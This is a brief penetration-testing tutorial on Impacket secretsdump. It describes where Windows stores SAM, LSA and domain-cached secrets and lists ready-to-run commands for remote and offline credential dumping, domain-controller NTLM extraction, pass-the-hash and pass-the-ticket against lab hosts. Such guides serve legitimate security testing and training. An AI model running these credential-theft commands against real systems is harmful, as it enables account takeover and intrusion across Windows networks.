Impacket SecretsDump is a powerful tool used in penetration testing and ethical hacking for extracting plaintext credentials and other sensitive information from Windows systems. Developed in Python, Impacket is an open-source collection of Python classes for working with network protocols. SecretsDump, a part of the Impacket suite, focuses specifically on extracting credentials and secrets from Windows machines.

Hive Details Format or credential material
SAM stores locally cached credentials (referred to as SAM secrets) LM or NT hashes
SECURITY stores domain cached credentials (referred to as LSA secrets) Plaintext passwords

LM or NT hashes

Kerberos keys (DES, AES)

Domain Cached Credentials (DCC1 and DCC2)

Security Questions (L$SQSA<SID>)

SYSTEM contains enough info to decrypt SAM secrets and LSA secrets N/A

Capabilities:

  • Credential Extraction
  • Kerberos Ticket Extraction
  • NTLM Hash Dumping
  • Local and Remote Operations
  • Pass-the-Ticket (PTT) Attack

How to use

1. Display the tool help

  • impacket-secretsdump -h

2. Remote dumping of SAM & LSA secrets

  • impacket-secretsdump lab.local/vry4n:IamAdmin123@192.168.0.101

3. dump the NTLM from DC, Active directory users

  • impacket-secretsdump lab.local/vry4n:IamAdmin123@192.168.0.100 -just-dc-ntlm

4. Remote dumping of SAM & LSA secrets (pass-the-hash)

  • secretsdump.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'
  • impacket-secretsdump lab.local/administrator@192.168.0.100 -hashes aad3b435b51404eeaad3b435b51404ee:702262e2d64f9c0df2bec8ca45ff2985

5. Remote dumping of SAM & LSA secrets (pass-the-ticket)

  • secretsdump.py -k 'DOMAIN/USER@TARGET'

6. Offline dumping of LSA secrets from exported hives

  • secretsdump.py -security '/path/to/security.save' -system '/path/to/system.save' LOCAL

7. Offline dumping of SAM secrets from exported hives

  • secretsdump.py -sam '/path/to/sam.save' -system '/path/to/system.save' LOCAL

8. Offline dumping of SAM & LSA secrets from exported hives

  • secretsdump.py -sam '/path/to/sam.save' -security '/path/to/security.save' -system '/path/to/system.save' LOCAL